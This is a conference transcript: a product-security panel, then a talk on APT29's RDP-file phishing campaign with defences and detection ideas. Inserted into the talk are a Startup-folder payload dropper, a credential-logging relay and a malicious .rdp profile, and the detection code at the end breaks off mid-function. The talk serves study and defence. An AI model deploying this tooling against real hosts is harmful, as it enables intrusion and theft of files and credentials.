the perfect intro to the next question, which is the most voted one in the Q&A: 12 people really wanted you to share your war stories on how you failed to secure your product in the past and what you learned from it. Who wants to get started? >> Oh dear. It's my own mistake, you know: just making a website in PHP, way back when it was still 1.0 or something similar. And I just realized I had opened everything up to the world, and within minutes, back then already, it was gone. So it's not a real war story, just a stupid mistake, which most of them are. >> Well, you can let someone else share their story. >> Yeah, I was going to say: I'm very young, so my day to make those mistakes is still coming. Stay tuned. >> I think I've been lucky. I don't think I was ever working somewhere that was hacked, in any spectacular fashion or anything like that, at the time. I've had incidents of availability, like DoS or DDoS, where someone found a bug and realized you could make our services stop. Basically it was not too bad, to be honest. But DDoS, yeah, that hits a lot of companies, and that's not really the kind of story people are looking to make
us walk through, right, to talk about. So nothing really to share, honestly, in that sense. >> I do have one. It wasn't me, and again, it was not a security vulnerability; it was a business logic issue that resulted in... it wasn't a breach, so I'll just say it. The way the website was set up at a previous retail company was: if it couldn't fetch the actual price of a product, it would throw up $10,000, on the assumption that, you know, if it's a pillow, nobody's going to pay $10,000 for a pillow. That business logic error didn't cause a breach. What it caused was a disinformation campaign that hit us pretty hard. We were accused of trafficking children in cabinets. We were not, by the way, and please don't go Google it without using an incognito browser. But the damage that can be done by not thinking things through... and again, it wasn't a security vulnerability. The team just said: if we can't figure out what the price is, we'll throw this up; nobody will ever pay that, nobody will believe that's the real price, and we'll just treat it as an error message. And it created... I have never spent so much time on the phone with the FBI in my entire life, and I really don't wish to do it again. So those are the kinds of little things people don't really think about: from a product security standpoint it wasn't really a security thing, but it caused a really big security problem. It led to people trying to DDoS us, people trying to break into warehouses to free children that didn't exist. It was a very long week, and it still comes up every now and then. We did not. We were not. I promise. >> If you want to hear real war stories,
don't put us on a stage like this. >> Yeah, that's what I was thinking. >> That one's public. There's a whole other set we can't talk about. >> So yeah, you can come to them afterwards and ask in private. Well, the 12 people who asked that question can. The next question actually also reflects on what Leandro mentioned about hiring someone and making them grow within the company, because a lot of people also want to know: how do you retain, grow, and support internal talent and careers, since product security needs both business and tech knowledge, making onboarding long and costly? From anonymous. >> Yeah. So we actually have quite an intensive system for that. There is the product security community, which you can choose to join if you're interested, and that's where you get the basic information on how a product is secured and what is going on in the world right now. Besides that, there is a full track for improving your product security skills. It goes from the awareness level, what is in the security development life cycle, up to the point where you can become a representative, and to be that you need to do certain workshops: you need to be able to hack the OWASP Top 10, you need to know about embedded systems security. From that moment on you can grow to a master and an expert level, by engaging with other groups, for example about quantum security, or by doing a project together with research. So in this way a lot of training and a lot of group culture is provided, and there's also a stage for it: through this community you can request to do a webinar, and you will have people interested in the same topic for a discussion, which can be anything from tooling to "hey, I have this new AI, let's try and social engineer it". So we do it through fun and training.
>> That's very nice. I honestly applaud what you have there already; I think it's really cool. From my perspective, I've noticed that a lot of the smaller teams have a bit of difficulty sometimes with mentoring more junior people. I think that is the main difficulty: there's a bit of a wall from junior to medior when it comes to product security, and I think it's difficult to reach that stage without some help. It is a difficult field when it comes to knowledge, but I think that part is somewhat simple. You can take any type of engineer that is not a security engineer and turn them into a security engineer. The security knowledge is of course difficult, but it's not that lengthy; you can study it in a year or so and already become extremely useful. So that's one approach: take someone who is turning their career around and starting out in security. I think there are a lot of people interested in security, and I would advise you to give them a chance. These types of engineers are often the most passionate professionals you can get, right? I also have people starting out in their first security role ever, where you can see they wanted to do this their whole life. It was meant to be. So really take advantage of people's passion, in a good way, I should say, because passionate people will be your best teachers, your best culture drivers, your best allies. And when it comes to knowledge, again, it should be something a bit more organic, in my view. That's why I also like what Cass was talking about, because I believe in more organic knowledge, where you discuss it, where you talk to each other. I'm less of a believer in courses. I think courses are extremely important, certifications as well, but I would say that the core knowledge you get in security is self-taught, perhaps, and a little bit discussed within the team. So I would heavily advise, and we've been having a lot of success with this, having our own security discussions. We talk about security principles, about how we do security by design. We go over the OWASP frameworks that we have, we go over regulations, we go over all of these things together. Of course, sometimes it takes more time than we're expecting, especially with NIST 800-53. All of the
bigger ones will take a lot of time, but I can definitely tell you from experience: it's worth it. >> Just to add to that: as a leader, manager, whatever, I think it's always very nice to see people grow, right? If you can manage that, if you can see that part, it's very rewarding. So for me, it is about embracing failure. Fail fast, extremely fast, and learn fast. That's the key. Especially if you have people that are very passionate, love to question things, love to figure out how things work; those are the best people to try and get, and those are mostly the very young people that are not working in security right now. I had one person that came from a cognitive science background. Oh my god, that's amazing, especially if you put that to work on security awareness and phishing and those kinds of things. That would be fireworks, I can guarantee it. So absolutely do that. >> Yeah, I wanted to add to what you're saying. Something we did recently is we organized two events. One was at awareness level, so you have people from marketing coming in and asking questions, and you can see a little bit of who is security aware and who wants to know more. The other thing we did is a very low-barrier entry workshop, which we called a capture the flag, but it was basically: here's three hours of your time, any level can do this, because we made sure it really starts from the beginning and everybody and anybody is welcome. So we did that training, and at the end of it we explained: if we sparked that security passion in you, which definitely happened with a few, please reach out, because we can help you expand further into it. And that definitely recruited quite some developers to the security side; it was really successful. >> So we have three minutes left and
more than 20 questions, so I think you'll have some time to ask them personally after the panel. I'm going to pick maybe the last one, which is very interesting, and maybe something Marty just discussed as well: how do you scale a small product security team to an organization with hundreds of developers? >> To me? >> Yeah, how do you scale that? >> Oh, that's difficult. >> You want to go first? >> No, go on. >> Like I said, it's difficult. I'm just trying to wrap my head around it. >> It's very difficult. So I can tell you from experience what we've been doing. We have security functions in other parts of the organization, but we're also starting a team that's more specialized in this for our client. So it's a smaller team that needs to scale from the start. It started with three people; it was very difficult to scale with three people, but we managed, and we have three laws for it. The first one is: make sure that everything you do is simple. Take threat modeling, for example; threat modeling is something that normally requires a lot of your time. So make it simple, make it so that teams can take steps and adopt it very quickly. They do have to maintain it over time, of course; it's a living document. Then they get the benefits over time, and their threat model actually gets pretty deep. And the third law is: you should never be married to your efforts. If something is not addressing risk enough, or is just too difficult to maintain, something that is not bringing you the benefit you were looking for, drop it very quickly. Drop it like it's hot. So, the first law: simple, really, MVPs everywhere; start improving after the fact, after you launch. The second law: make it a service. Our teams, for example, don't need us for threat modeling if they don't want to; they can do it by themselves, and they love it. They can be self-empowered, right? And then you can scale. If everything you do depends on your team, then you're never going to scale, especially with three, four, five people and thousands of developers; that will never work. So allow teams to be self-served, and then, when they need your help, when they need a specialist in the meeting as a subject matter expert, then you'll
be there. That's the only way. >> Just to tap into that one: I fully agree. Also, make certain that it's very clear what the goals are. Set up achievable goals, maybe distant but achievable, and then measure against them. And again: fail fast. >> Just one other really quick thing, because I know we're running out of time: make it as easy as possible. Build it into the process as much as possible. Put it into the build pipeline, put it into the deploy pipeline. And as Leandro said, do MVPs as much as possible. You're not going to be able to block everything right away, and you're not going to be able to give everybody a list of 100,000 vulnerabilities; that's not useful. Figure out, in small chunks, what's the thing we need to focus on. Maybe you do a scan and realize you've got one specific problem that keeps showing up across the company; then just scan for that first, teach people about it, and continue to iterate. If you put it into the process and the habits they already have, start small, and then build on that in layers, you'll also find the people who are really interested in security and really interested in tinkering, and you can use those folks and their energy to help evangelize for you. In previous companies we've had security guilds, and I actually had somebody write a good portion of our automation who was not even part of the security team, because he just liked tinkering and kept asking really good questions about security in our little Slack guild chat. I asked him a question one day, and he fully automated the report I was looking for. Done. So you will find the people if you give them the opportunity to ask questions and contribute. >> Well, thank you so much. We're a little bit over time, so please give a round of applause to our panelists. If your question wasn't answered, please feel free to ask, because I saw there were also some personal questions for Leandro and Cass. So yeah, please feel free to come and ask them. Thank you. >> Thank you. >> Thank you all.
Uh, we are getting started, so please take your seats.
Okay.
So I guess everyone here in the audience is an APT-techniques-loving hacker. That's why you're here, right? Yes. Okay. So please welcome to the stage our next speaker, Mickey Debbats. He's going to give you a talk on remote desktop exploitation: a deep dive into Midnight Blizzard's RDP phishing tactics. >> Please give him a round of applause.
>> Thank you. So today we will dive into how Midnight Blizzard, also known as APT29 or Cozy Bear, has been using remote desktop as a way to get into other companies and into government organizations. Before we start, I first want to elaborate a bit on why I chose this topic. Coming from an offensive security background, I really enjoy, probably like many of you here, reading up on the variety of TTPs used by APTs. When I was researching this particular topic, there was, around the same time, this really nice in-depth investigation of an attack by the NSA, I don't know if anyone saw it, on a Chinese polytechnical university. You start reading it, and the attack went roughly as follows. From what I can remember, it was a while ago, but basically they started by hacking the edge routers of the university, then deployed custom firmware to get a man-in-the-middle position, so they could inspect the traffic and redirect all web traffic to a custom zero-day browser exploitation framework, serving the right users the right browser zero-day. Now, when I'm reading this, I'm like: okay, super interesting, but this is not something I can just set up for my next red team. So that was a bummer. But then you read articles about how
APT29 is using just a stupidly simple RDP file to get initial access, without any issues like being blocked at the mail gateway or getting flagged as malware or anything like that. So it's very simple, yet highly effective, which for me was an "aha, I can use this" moment, and that's why I chose this topic: it's just a super interesting technique being used by these adversaries. For the agenda: first I want to dive into who I am, a bit of my background, but not too much. Then we'll go straight into the threat profile: who is APT29, but also, what defines an APT? Then we'll talk a bit about the timeline of the whole engagement: how did it go, which preparations did they make, how did they set up the environment, and what are the options for weaponizing RDP? I'll end the session with a quick demonstration and some advice on how to detect, prevent, and hunt for this particular attack. So, who am I? My name is Mickey Debbats. I'm currently the lead offensive security engineer at Vectra, the NDR company. I'm also a Hack The Box ambassador for Belgium, I teach at a Belgian college, and I'm the founder of BOPS, a red-team-specialized company in Belgium. So, the threat profile. I've been using Midnight Blizzard and APT29 a bit interchangeably, but before we define who is
Midnight Blizzard, and why they do what they do, we have to start with: what is an APT? APT stands for advanced persistent threat. Why advanced? Usually they have a full spectrum of intelligence gathering they can rely on. That usually goes hand in hand with being a state-sponsored group; it's not that every APT is state-sponsored, but we do see a lot of APTs that are. So you have the full capacity of your country's intelligence operations behind you to run your engagements, which normally, as a red teamer, you don't have. That's already quite a difference. Why persistent? Think about the times somebody tried to scam you: they call you up, they try to get you to download AnyDesk or TeamViewer, or to do a quick task, and the moment you struggle, they just hang up and move on to the next one. They won't actually put effort into you; you're not special. Unfortunately, these APTs are persistent. They have a target, and they will do everything they can to reach it and carry out their actions on objectives, to make sure they get what they want. Sometimes these operations last for years, and they don't really care if they have to wait two years to actually get what they want.
That's okay for them. And why are they a threat? Well, if you have the capabilities and you have the intent, then you become quite dangerous. Usually they also have the funds for these super long operations, working full-time on very niche targets. Some very well-known examples: APT44, also known as Sandworm, a Russian APT, part of the military intelligence service there. They are known, for example, for a lot of wiper malware; I think it was in 2018 that they deployed wiper malware, and that is what made them very well known. Also Lazarus, allegedly North Korean, known for the very expensive crypto heists, I think the biggest one in history at $1.5 billion US, of which, I think, 20 or 25% they had already successfully laundered. And a funny one: the NSA, the Equation Group, is actually also an APT. One of their more recent campaigns, allegedly, was the one on the national time service center in China. I don't know if anyone has read about that attack; also a super interesting one. They basically found an exploit in the SMS service of a foreign phone brand and used it to spy on some managers and high-level profiles within this time service center organization. Eventually they were caught, but it was an operation that started in 2022 and went on until somewhere late 2023. Now, why would you attack a time service center? There are a lot of reasons: a lot of critical infrastructure relies on being in sync. If you ever had to debug Kerberos errors because you weren't in sync with the domain controller, you know the pain. Imagine that on a national scale. So there's a variety of APTs, and why they do what they do really varies per group. And no, this is not the APT I'm talking about; when I talked about APTs at home, they were like: since when are you into K-pop? But that's not what we're going to talk about today.
So when we look at APT29, Cozy Bear: it's been attributed to the Russian foreign intelligence service. How do we know this? I'll get back to that in a second. They mainly target NATO countries, and it really varies what kind of target they pick: it could be an organization related to a university, it could be a think tank, it could be an NGO, it could be basically anything. Their main goal is to obtain information and intelligence that could help Russia with anything, economically, geopolitically, on any level; if they can even get some patents that give an edge in a certain branch of business, they will go for those too. So: any organization linked to something from which they can gather intelligence that benefits Russia. That's their goal. Now, which TTPs do they use? A lot of supply chain compromise, and I mean a lot; we saw a very big one, we'll get to that in a second. Some PowerShell, phishing, they're big fans of phishing, and more and more cloud as well. Now, from where you may know APT29, Cozy Bear: it started back in 2014, when they attacked several US government institutions. The White House was part of this, and also the Democratic Party. Around the same time, Dutch intelligence was working together with US intelligence, and the Dutch may or may not have, so allegedly, hacked one of the cameras in the main corridor of APT29's office. If you have vision on the corridor, you also know who's walking in and out. They were sharing this information with the US, which helped pretty quickly to identify that this group was part of Russia's foreign intelligence service. After that they did some more attacks: they hacked Denmark's national bank, they targeted some COVID-19 vaccine development centers. SolarWinds, small company, not a big deal, maybe rings a bell; still one of the biggest supply chain attacks in history. This is how I imagine SolarWinds feels whenever you mention them, because I feel like the only thing they're still known for is being the biggest supply chain attack in history. Microsoft, in 2024: a very interesting case, because they weren't after Microsoft's data, or even Microsoft's user data. They basically hacked Microsoft just to see: hey, what do you guys know about us? They were explicitly searching for what Microsoft's threat intelligence team had on Cozy Bear. A very interesting attack; maybe a bit too much effort, I don't know. A bit after that, they also hacked TeamViewer. TeamViewer came out with a statement, somewhere late 2024, in which they did admit they had been hacked by APT29. However, they did mention that it was not the production environment but the corporate environment, so another SolarWinds was basically out of the question. Then, CERT-UA case number 11690. What happened? On October 22nd, 2024, the Microsoft threat intelligence team saw that there was a massive phishing campaign going on, and they quickly attributed it to Midnight Blizzard, Cozy Bear. It was a high-volume spear phishing campaign: they were seen sending over 1,000 phishing emails to people in over 100 organizations. Governments, academia, think tanks, NGOs, but also private sector companies. They first had to prepare this whole attack, so they were registering
domains, setting up their infrastructure, and getting ready a couple of months before they actually launched the attack. The phishing itself was a quite nicely crafted campaign. They were pretending to be Microsoft, or pretending to be AWS, and really riding the zero trust hype, saying: hey, in order to comply with zero trust and have a zero trust environment, you just have to do this quick step, you have to connect to this RDP server, and that's it. We'll dive a bit more into their lure in a second. Then the RDP files. These phishing mails had one attachment: an RDP file. And why is this brilliant? If you look at the most modern mail gateways in use, they do not block RDP files. They still don't. You can look up Microsoft's list of attachment types that are blocked by default; you won't find RDP in there. And then they were using this RDP connection to basically mount the file system of the user. Once you have access to the file system, there's a lot you can do; we'll see that later in the presentation. But one of the things you can do is deploy malware. So no fancy zero-day technique, just a stupid RDP file mapping your file system and some scheduled tasks. Trend Micro also did a lot of
investigation into this whole attack, and they identified the pattern that was used to register domains. Here we can see, starting from the beginning of August up until the 20th of October. A bit late if you want to start phishing on the 22nd, but we don't judge. And you can see that they were relatively well prepared: starting from August they were averaging 10 domains a day, and back in September it was even 13 domains a day they were registering. These domains were located in Australia, Ukraine, Estonia. Again, what you will find in this list is a lot of NATO member countries, which completely fits the methodology of how APT29 operates. If you look at the domain names they registered, what kind of impersonation were they trying to do? Maybe try to identify the targets: again NGOs and think tanks, military, IT, but even telecom and some private sector as well. So again, perfectly fitting the whole approach of APT29. I'll give you guys a second to read the phishing email. No, I have a translation as well. Basically, what it comes down to, and this is only one of the campaigns they used, is that they were pretending to be Microsoft and AWS, saying: hey, this zero trust thing, we really need to get this configured ASAP. So, we have attached your zero
trust configuration profile checker. Just double-click, connect, and it will do everything for you. That's what it boils down to. A very interesting thing about this phishing campaign is that they used AI, but in a very special way. They end the phishing email by saying: by the way, if you have any concerns, if something is not working, if something's weird, we're monitoring this with Amazon Q Business. That's an official AI product that Amazon offers. So basically they're telling the user: if anything goes wrong, don't tell anybody, the AI will fix it, we will know because of AI. A very interesting use of AI. I feel like a lot of users are warming up to AI; they're using it in a variety of products, so they're starting to know that AI can handle certain tasks. So to see it being used in a way like this, where you're telling the user, hey, don't worry if something goes wrong, don't reach out to anyone, AI will fix it and we will know, is actually not that bad of an idea. The RDP file itself: there is a lot going on, even if it's a single file. So you download a file, you can see it here, and it will just look like a regular RDP file. They were using remote applications (RemoteApp). So when you double-click, you don't get the whole virtual session, you just get a single application that is running on a remote server, but you as a user would not know. If we look at the warning we get when connecting, you can see that your drives, your clipboard, basically everything that can be mounted to the remote server will be mounted. Would the user see this? Probably not. Why? Because, as you can see here, this is something you have to explicitly expand. If you don't click on "show details", you would never know that all of this is being shared with the remote desktop server. I'm a bit in the way, but as you can see
here on the left side, they were for example impersonating the Ukrainian government. For that, they registered the domain uv.cloud. And on the other side, you can see that they had a valid certificate: these RDP files were being signed, with Let's Encrypt certificates, to have a bit more reputation. So, what are the different ways we can weaponize RDP? Well, the most popular one right now is PyRDP. What is PyRDP? PyRDP is basically an open-source tool that gives you a man-in-the-middle position on an RDP connection. The way it works: normally, with a regular RDP setup, you have a client and an RDP server. You connect, and you can then send mouse movements, you can send commands, and you have a whole virtual interface in which you can control the remote server. PyRDP is a Python tool that you can run on a Linux machine. You place it in the middle; it listens to anything coming from the client and forwards it to the remote server. Now, what is the beauty of PyRDP? It offers certain capabilities. It offers clipboard monitoring. You can crawl the file system. You can see what the user has been doing; you can record the whole session and replay it afterwards. You can even do certificate cloning. And the most important one: credential sinkholing. If you have been wondering, okay, nice attack, you make the user connect to an RDP server, but how do you get the right credentials to the user? Because when I want to remote desktop to any server or host, I have to enter valid credentials. Well, this is the most powerful feature PyRDP offers: it doesn't matter what credentials you enter. Normally, with modern RDP setups, you have to enter credentials because NLA is enforced. If you disable this feature, Windows will, as with anything, try to authenticate on its own, and if we just allow anything, then immediately, without prompting for credentials, you are connected to the remote desktop server. And that's the beauty of it all: you don't need to get valid credentials to the users. The user can just double-click, enjoy, and they're connected. The way they had this infrastructure set up, also mapped out pretty nicely by Trend Micro, is that they used an abundance of anonymization: Tor, VPNs, proxy servers, to connect to the 34 RDP back-end servers they had. I've already told you these were thousands of emails being sent to people in over 100 organizations, so you need quite the infrastructure. So they were
using 34 RDP back-end servers, and they had 193 proxy servers. I think the number of domains they had registered was about 200. So they were pretty well prepared. In this case, to go back to the previous image, that would mean on the RDP server edge you had 34 servers available and 193 different proxy servers to relay everything you're doing. Okay. So they can RDP, that's fine, right? Well, it depends. If you share your file system, what are the opportunities you have as an attacker? First of all, the clipboard. It's nice: maybe they already have their password copied because they were expecting to enter it. That can be interesting. The file crawling: super interesting, you might find some interesting credential material on the host. But the file system mapping is the most important one for this whole attack, because once you have the file system mapped, what can you do? You can deploy a LNK file on the victim's desktop. That could be nice. It's not very intrusive; it's not that wow, it's a LNK file. You can mess with the icon; there are a lot of things you can do to make it more appealing to the user. It's very easy to do, and it blends in. Well, it depends. I'm a bit of a freak when it comes to my desktop, nothing touches my desktop, but I've seen other desktops where for sure you would not see this LNK file. You can then create a shortcut that activates the LNK file. The only disadvantage here is that this is not active until you reboot the machine, so you have a delayed execution, which can be worth it: you just have to wait a bit longer. And you do need the user to actually use the shortcut to activate the LNK file, or you have to hope they manually double-click the LNK file, but that could be a bit trickier; otherwise you would have to wait until they actually use the shortcut.
The Startup folder, very interesting as well. You would just copy something from your RDP server to the mounted file system, into the Startup folder of any user. It's very easy to create a PowerShell script that goes over all the user folders and tries to put something in every user's Startup folder. It's reliable: you get very reliable execution. Next startup, you immediately get a connection. You don't need any interaction; you're not waiting for the user to do anything except, well, rebooting, but normally, eventually, they will do that. The problem is that a lot of EDRs these days will easily flag something appearing in your Startup folder. So that might be an issue.
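A minimal sketch of that Startup-folder drop, assuming the victim's C: drive is mounted somewhere on the attacker's machine. The mount point, payload name, and `Users` layout are illustrative; the actors in this campaign used scheduled tasks and scripts, not this exact code:

```python
import shutil
from pathlib import Path

# Illustrative root of the victim's file system as mounted through RDP
# drive redirection (hypothetical mount point on the attacker's side).
MOUNTED_ROOT = Path("/mnt/tsclient_c")
PAYLOAD = Path("payload.exe")  # hypothetical payload name

# Per-user Startup folder, relative to each profile directory.
STARTUP = Path("AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup")

def drop_into_startup_folders(root: Path, payload: Path) -> list[Path]:
    """Try to copy the payload into every user's Startup folder."""
    dropped = []
    users_dir = root / "Users"
    if not users_dir.is_dir():
        return dropped
    for profile in users_dir.iterdir():
        target_dir = profile / STARTUP
        if not target_dir.is_dir():
            continue  # not a real profile, or no Startup folder visible
        try:
            dropped.append(Path(shutil.copy(payload, target_dir)))
        except OSError:
            pass  # no write access to this profile
    return dropped
```

On next logon, anything in that folder runs automatically, which is exactly why EDRs watch it so closely.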
We have DLL sideloading. Also very interesting: you place a DLL in a location where you know a program will load it, and then you just wait for the user to use the application. The application loads the DLL, and your payload is executed. Very stealthy, and it bypasses certain constraints such as application whitelisting if they have AppLocker or WDAC configured. Very nice to have sideloading in this case. The problem is, let's say you go for the sideloading approach: I can tell you there's nothing more frustrating than having your Teams sideloading payloads ready to use, and then you're on the host system and you find out they're using Webex. That's terrible. So you do need certainty that they're actually using the application you want to target for your sideloading. AppDomain injection, also a nice one. Very stealthy, also bypasses application whitelisting; it's basically the sideloading variant you have in .NET applications. It's a bit more complex, and again, you want to target something you know for sure they will have on their system. Some honorable mentions. Data exfiltration: again, that file crawling running in the background is super interesting, because you will get a lot of configuration files that might have passwords. Maybe the user has a passwords.xlsx on their desktop. There might be very valuable information coming from your data exfiltration. And in the past there were also some RCE techniques coming from remote desktop. Now, the whole thing we've been mentioning, maybe you're like, hey, this sounds familiar. Well, it was published a while ago by Black Hills Information Security. They did a very nice write-up on how it works, their process in going through the setup, and why they wanted to use RDP for initial access. So then you're thinking: yeah, but you said an APT, they should be advanced. Well, sometimes it's the simple things that work. A very interesting thing, if you look at this whole RDP technique being used
first by Black Hills Information Security and then by an APT: a lot of APTs are also actively monitoring what's going on in the red team and pentesting space, and they might use techniques from blog posts, from trainings, these kinds of things. It works both ways: as a red team you're also going to steal some techniques that an APT uses, and they do the same. So that doesn't make a difference; it seems like fair play. The thing you should ask yourself, because this is a whole debate, right, is: do we need to keep publishing write-ups on these kinds of things? Because, for example, if Black Hills Information Security hadn't published their blog post on RDP being used for initial access, maybe they wouldn't have used this. Maybe APT29 would never have figured out how to use RDP for mounting the file system and then deploying malware. But I mean, I'm not here to fire up this whole infosec debate that's been going on for years. I just want to say: if this is something that bothers you, if you're looking at this and thinking, ah, these damn red teamers, why do they have to share all this tradecraft, would you rather know how this works and how you can defend against it, or would you rather not even know that this RDP man-in-the-middle kind of attack exists? I feel the latter is much worse, if you think about it. So, yeah, I have a demo. I have it both on video and live, so we pray to the live demo gods. If that doesn't work, I'll have to fall back to the video.
So it should be nice.
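To make the man-in-the-middle position concrete before the demo: PyRDP is far more capable, but at its core it sits between the client and the server like a relay that sees all traffic. A toy sketch of that position, plain TCP only, with no TLS or RDP protocol handling (names and the capture list are illustrative, not PyRDP's actual design):

```python
import socket
import threading

def relay(listen_port: int, target_host: str, target_port: int,
          log: list) -> threading.Thread:
    """Accept one client, forward traffic both ways, and record
    client->server bytes in `log` (a stand-in for credential and
    clipboard capture in a real RDP MITM)."""
    def pump(src, dst, capture):
        try:
            while True:
                data = src.recv(4096)
                if not data:
                    break
                if capture:
                    log.append(data)  # the MITM sees this traffic in the clear
                dst.sendall(data)
        except OSError:
            pass
        finally:
            dst.close()

    def serve():
        lsock = socket.socket()
        lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        lsock.bind(("127.0.0.1", listen_port))
        lsock.listen(1)
        client, _ = lsock.accept()
        upstream = socket.create_connection((target_host, target_port))
        # Server->client direction in a background thread, no capture.
        threading.Thread(target=pump, args=(upstream, client, False),
                         daemon=True).start()
        pump(client, upstream, True)  # capture client->server direction
        lsock.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return t
```

The real tool additionally terminates TLS on both sides, speaks the RDP protocol, and handles the NLA downgrade; the point here is only the vantage point a relay gives you.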
So, on the right side I have my PyRDP man-in-the-middle listening. And here on the left side, I have my victim machine. I have this RDP profile that I sent to my client. It's not signed; I'm too poor to afford code signing certificates, so I don't have the funds that an APT has, unfortunately. But you can see that I also have some files in my Downloads folder, and I have a clean Startup folder as well. So normally I don't have anything to worry about. And then it's as simple as just opening this profile. Now, you do get this banner: are you sure you want to establish this remote connection? The thing is, this is not an abnormal banner. You don't get this from Mark of the Web or anything else; even connecting to an internal host for the first time, you could get a banner like this. So this doesn't necessarily say anything. You could go for the "show details" like I mentioned, but no user is going to do that. Why would you want to see things you don't understand anyway? So you just press connect. Now a lot of stuff is happening here. In this case I placed a small distraction: of course we want to know if your AWS storage is correctly configured, so please do wait until it has done all of its checks. And you can see on the right side that the whole file system is being crawled and downloaded to the RDP server. Now let's say I was a prepared user: I know a bit how this works, how to remote desktop to another machine, so I knew I might have to get my password ready. So I copy it to my clipboard, and you can see here the clipboard is also being monitored, so the attacker would also have my password. At this point I'm not sure why I'm doing this; I will close this because I've been doing it for way too long. 40%. So this stops. And if we check the file system, you can see on the evil RDP server we have the whole file system, a lot of anti-ransomware stuff from Elastic. It doesn't have everything, because I aborted it a bit quickly, but you can see it doesn't take long for the malware to appear in my Startup folder. So that's how easy it is. Even if I hadn't waited until 40%: the moment you connect, you can easily configure a scheduled task that runs when you log in, and when you log in, it's just as easy as: copy this file to this directory. You have their file system mapped, so you just go through all users, to their Startup folder, and see if you can write something there. That's how easy it is.
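For reference, the kind of settings a malicious profile like the one in this demo can carry. The option names below are standard .rdp file options; the values and the server address are made up for illustration:

```
full address:s:attacker-controlled-server.example:3389
remoteapplicationmode:i:1
remoteapplicationname:s:AWS Secure Storage Configuration Check
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:1
authentication level:i:0
```

`remoteapplicationmode` gives the single-app window instead of a full desktop, `drivestoredirect:s:*` shares every local drive, and `redirectclipboard` hands over the clipboard, which is everything this attack needs.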
So, of course, you don't want this to happen to you. Now, the odds of you being targeted tomorrow by APT29 are quite low. Maybe not unlikely, but quite low, so don't lose any sleep over this. But what can you do? You can block RDP files on your mail gateway. Just a simple thing to do: normally you don't expect your users to receive RDP files in their inbox. For users that usually don't come into contact with a remote desktop server, you can simply block RDP files entirely. Even better, you can use the Windows host firewall to not allow mstsc.exe, the RDP client process, to make any connections to the internet. Maybe you are using RDP, but usually you're only RDP-ing to other servers in your own network, so you can just say: this process shouldn't make contact with the internet. Even better is to use GPO to your advantage and not allow users to share things like their clipboard and their file system with remote desktop servers. And of course, if they steal credentials, I mean, you should have MFA in place, and conditional access policies. There's also a nice query to hunt with: if you're really going to lose sleep over this, you can get a bit of peace of mind knowing that you didn't get any mails with RDP attachments from a Russian intelligence group. And even if you see something from this query, well, it could have actually been it. Now, detection. This is also something interesting to investigate. There are a few things you can actually do to detect this while it's going on. First of all, if you work at an NDR company, the first thing you're going to do is launch the attack against your own NDR product. One of the early signs was smash-and-grab detection. I don't know if there's a better name for it, but the fact that
you're connecting to a site you've never seen before and suddenly uploading more data than you're receiving could be quite suspicious behavior. You can see it here: normally this host sends almost nothing, and suddenly I'm sending 207 megabytes. It's not in this screenshot, but I think the data downloaded was even only about 25% of the data sent, so that's already quite suspicious. Another interesting avenue is JA3 and JA4. Who knows what JA3 and JA4 are? Some enthusiasts. So, whenever you set up a connection, you will probably use an encrypted channel; when you connect with RDP, this is done over an encrypted channel using TLS. Now, what are JA3 and JA4? You can basically fingerprint every TLS connection. Me as a client, I will offer a specific set of ciphers and perform some other actions when I connect over TLS, and the server will do the same. This combination of your behavior, which ciphers you accept and which ciphers you offer, can be fingerprinted. JA4 goes a bit more in depth, but basically this TLS fingerprinting is a technique that's being used more and more to identify services. It might be a bit small, but of course, when I connect to a legitimate Windows server, the TLS stack will look different compared to that of the Python SSL library. So purely from this you can already see that something weird is going on. On the left side here I have my connection to PyRDP, and on the right side my connection to the actual RDP server, and you can see, well, maybe you cannot see, but you will find out later in the slides, that the hashes of the fingerprints are different. And another very interesting one, I actually wasn't aware of this in the past: if you perform some decryption, you can actually find out
that the packets you send to the RDP server also contain your keyboard layout. And this is something that's very tricky to get right. Let's say you're a Russian APT and you're targeting, as we saw, Australia, Ukraine, basically every NATO member country: you cannot set up an infrastructure that mimics every keyboard layout. And maybe you just don't think about this and you leave your keyboard layout at the default, whatever the standard Russian layout is. What you can see, if you perform some decryption, is the field highlighted in blue: in your decrypted RDP packets you can find the code that maps to a certain keyboard layout. So let's say one of your users is connecting to a server and suddenly, instead of using the normal Belgian keyboard layout, they're using some Cyrillic keyboard layout. That might be a strong indicator that something is wrong. That's all. I hope it was interesting. I also have the QR codes. Before I end this talk, I really want to give a shout-out to CERT-UA, the Ukrainian CERT. This was only one attack that they encountered. A few weeks ago there was a conference dedicated to nation-state tradecraft where everything was TLP:RED, so I can't talk too much about
it, but they have been bombarded with one attack after the other. Just covering this one attack, seeing where have we been hit, did they deploy malware, I feel like that would already be the normal SOC nightmare, and this is just one of many. So, big shout-out to those guys, and also for the write-ups they made on the attack. And yeah, I hope you guys enjoyed the talk. >> Awesome. We have two minutes for questions. So, does anyone have any questions? >> Yes. You were talking about RDP files that were signed. You said it costs a lot of money. Is it not a Let's Encrypt type certificate? >> It really depends. You can get a code signing certificate for like €8, so it's not super expensive. Usually they won't play fair and pay for their code signing certificate anyway; they'll use something that was leaked or that they found during a previous hack. It's not super expensive, but it's just too expensive for a talk. That's what it comes down to. >> One more question? No, we're good. Okay, perfect. Well, thank you so much. And we are back: there is still another talk in the tech track, and we're back in 10 minutes for the closing keynote.
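As a small addendum to the detection section of that talk: both the JA3 hashing and the keyboard-layout check can be sketched in a few lines. The field values and the KLID table below are illustrative; real detections would extract these from the TLS ClientHello and from decrypted RDP traffic:

```python
import hashlib
from typing import Optional

def ja3(version: int, ciphers: list, extensions: list,
        curves: list, point_formats: list) -> str:
    """JA3: MD5 over the comma-separated ClientHello fields,
    with list fields dash-joined, per the original JA3 scheme."""
    fields = [
        str(version),
        "-".join(map(str, ciphers)),
        "-".join(map(str, extensions)),
        "-".join(map(str, curves)),
        "-".join(map(str, point_formats)),
    ]
    return hashlib.md5(",".join(fields).encode()).hexdigest()

# A few Windows keyboard-layout identifiers (KLIDs); values taken from
# Microsoft's language identifier tables, treat as illustrative.
KNOWN_LAYOUTS = {
    0x0409: "English (US)",
    0x0813: "Dutch (Belgium)",
    0x0419: "Russian",
}

def layout_alert(observed_klid: int, expected_klids: set) -> Optional[str]:
    """Flag an RDP session whose keyboard layout is unexpected for this user."""
    if observed_klid in expected_klids:
        return None
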